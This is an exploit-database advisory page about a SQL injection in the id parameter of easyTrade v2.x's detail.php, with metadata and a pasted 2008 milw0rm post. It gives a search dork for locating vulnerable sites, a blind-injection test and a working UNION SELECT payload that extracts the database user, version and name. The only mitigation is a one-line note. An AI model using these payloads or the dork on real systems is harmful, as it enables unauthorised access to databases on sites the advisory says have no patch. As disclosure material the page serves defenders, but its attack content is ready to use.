easyTrade v2.x SQL Injection Vulnerability

vendor:

easyTrade

by:

h0yt3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: easyTrade

Affected Version From: 2.x

Affected Version To: 2.x

Patch Exists: NO

Related CWE: N/A

CPE: 2.6:a:easytrade:easytrade:2.x

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

easyTrade v2.x SQL Injection Vulnerability

Script suffers from a not correctly verified detail id variable which is used in SQL Querys. An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. We dont get any SQL Errors when the Injection Query appear to be false. However we have to look for content changing when we inject. Look at AND 1=1/AND 1=0. SQL Injection: http://[target]/[path]/detail.php?id=[SQL]. PoC: detail.php?id=-1%20union%20select%20USER(),2,3,4,5,@@VERSION,7,8,9,10,11,12,13,database(),15,16

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

######################
#
#easyTrade v2.x SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "powered by easytrade"
#
##
###
##
#
#Script suffers from a not correctly verified detail id variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#We dont get any SQL Errors when the Injection Query appear to be false.
#However we have to look for content changing when we inject.
#Look at AND 1=1/AND 1=0
#
#SQL Injection:
#http://[target]/[path]/detail.php?id=[SQL]
#
#PoC:
#detail.php?id=-1%20union%20select%20USER(),2,3,4,5,@@VERSION,7,8,9,10,11,12,13,database(),15,16
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
####################### 

# milw0rm.com [2008-06-17]